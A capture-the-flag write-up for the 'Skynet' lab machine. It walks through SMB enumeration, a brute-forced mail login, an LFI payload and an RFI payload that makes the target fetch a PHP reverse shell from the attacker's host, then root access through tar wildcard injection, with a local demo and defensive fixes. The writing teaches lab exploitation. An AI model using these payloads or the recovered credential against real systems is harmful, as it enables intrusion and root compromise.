Skynet

Target IP: 10.10.17.113

A vulnerable Terminator themed Linux machine.
Are you able to compromise this Terminator themed machine?


Scanning

An nmap scan shows six open TCP ports: SSH (22), HTTP (80), POP3 (110), IMAP (143) and SMB (139, 445). The mail services and SMB share a host with a web server, which already hints at credential reuse between services.

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 992331bbb1e943b756944cb9e82146c5 (RSA)
|   256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_  256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE UIDL CAPA RESP-CODES TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID SASL-IR LOGIN-REFERRALS LOGINDISABLEDA0001 listed LITERAL+ ENABLE IDLE have post-login Pre-login capabilities IMAP4rev1 OK more
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

Enumeration

Ports 139 and 445: SMB
The SMB service accepts a guest (null-session) login. Listing the shares reveals one named anonymous, and it contains two files worth a look: attention.txt and log1.txt. I downloaded both to my machine.

log1.txt is a plain list of passwords. attention.txt is a notice signed by Miles Dyson, which gives a likely username to pair with that list.

Port 80: HTTP
Browsing to port 80 returns a simple landing page. Its HTML source contains nothing useful, so the next step is content discovery.

A directory brute-force turns up several entries; /squirrelmail stands out.

The login page identifies the application as SquirrelMail 1.4.23. A web search for that version turns up a known command-execution vulnerability, but it was not needed here: the credentials recovered next give direct access to the mailbox.

Using Burp Suite, I brute-forced the SquirrelMail login with the username milesdyson and the passwords from log1.txt. One attempt stands out by its different response length, which is the usual tell for a successful login, giving a working credential: milesdyson:cyborg007haloterminator.

With that credential I can read milesdyson's mailbox.

The first email contains a temporary Samba password for milesdyson.

Using smbclient //10.10.17.113/milesdyson -U milesdyson with that temporary password, I connected to the milesdyson share. Inside the notes directory is a file called important.txt, which mentions a hidden web directory at /45kra24zxs28v3yd.

Browsing to the hidden directory returns another web page.

Brute-forcing that path reveals an /administrator directory with a login form. Default credentials did not work against it.

Searching for the application name shown on the login page reveals that it is vulnerable to LFI/RFI through an unsanitized include parameter.

Using the payload http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php, I retrieved the configuration file. The php://filter wrapper makes PHP base64-encode the included file instead of executing it, so the source comes back intact and only needs decoding. The decoded configuration did not contain anything useful, though.


Exploitation

Since the same urlConfig parameter will also include a remote URL (RFI, which only works because the target's PHP has allow_url_include enabled), I saved the Pentest Monkey PHP reverse shell as shell.php with my IP and port 8443 as the callback, hosted it with Python's built-in HTTP server, and started a listener on port 8443. Requesting the payload below made the target fetch and execute the script, giving me a reverse shell:
http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.55.153/shell.php
I now have a foothold on the target machine.


Privilege Escalation

Checking the system cron jobs shows one that runs a script called backup.sh as root. I do not have write access to the script itself, so I cannot modify it directly.

The script calls tar with a wildcard (*) as its file list. The shell expands the wildcard into the names of the files in that directory before tar runs, so any filename that looks like a tar option is parsed as one. Because I can create files in that directory, this can be abused to get a root shell.

Following the GTFOBins entry for tar, I created files whose names are tar checkpoint options that run a command of my choosing. When the cron job next ran, tar executed that command as root, and I had a root shell. Game over.
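The script below is an added example, not part of the original writeup, that reproduces the tar wildcard injection locally so the mechanism can be seen without a target. It assumes GNU tar (--checkpoint is a GNU extension); the file names shell.sh, index.html and the marker file are my own choices, and the planted command only creates a marker instead of a reverse shell.

```shell
#!/bin/sh
# Added demonstration of the GNU tar wildcard (argument) injection used for
# the privilege escalation.  Not from the original writeup; it runs entirely
# inside a scratch directory as the current user and never touches the target.
# Requires GNU tar: --checkpoint is a GNU extension.

# Stage the crafted filenames in a scratch directory, then run the equivalent
# of the cron job's "tar cf <archive> *" there.  Returns 0 if the planted
# command ran, 1 if it did not, 2 if the local tar is not GNU tar.
tar_wildcard_demo() {
    tar --version 2>/dev/null | grep -q 'GNU tar' || return 2

    work=$(mktemp -d) || return 1
    archive=$(mktemp) || return 1      # kept outside $work so the glob does not include it
    marker="$work/.executed"           # hypothetical proof-of-execution file

    (
        cd "$work" || exit 1

        # The command the privileged tar run will execute.  On the target this
        # is where "chmod +s /bin/bash" or a reverse shell would go; here it
        # only creates a marker so the demo is observable and harmless.
        printf '#!/bin/sh\ntouch "%s"\n' "$marker" > shell.sh

        # Filenames that the shell's wildcard expansion turns into tar options.
        # "--" stops touch from parsing the dashes itself, which is the same
        # trick needed on the target to create these names.
        touch -- '--checkpoint=1'
        touch -- '--checkpoint-action=exec=sh shell.sh'

        # Ordinary content, as the directory being backed up would contain.
        echo 'index' > index.html

        # Equivalent of the cron job.  "*" expands to the names above, tar
        # parses the two crafted ones as options, and runs "sh shell.sh" at
        # the first checkpoint with tar's own privileges (root under cron).
        tar cf "$archive" *
    ) >/dev/null 2>&1

    if [ -f "$marker" ]; then rc=0; else rc=1; fi
    rm -rf "$work" "$archive"
    return "$rc"
}

# Stand-alone run: report whether the injected command executed.
tar_wildcard_demo
case $? in
    0) echo "injected command executed via tar checkpoint action" ;;
    2) echo "skipped: GNU tar not available" ;;
    *) echo "injection did not fire" ;;
esac
```

The fix on the defending side is to stop the glob from producing option-shaped arguments: archive the directory itself (tar cf backup.tgz .) or qualify the names so they start with ./ (tar cf backup.tgz ./*), and never let an unprivileged user write into a directory that a root cron job globs.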


Flags

The user.txt flag, readable once I had the foothold.

The root.txt flag, readable from the root shell.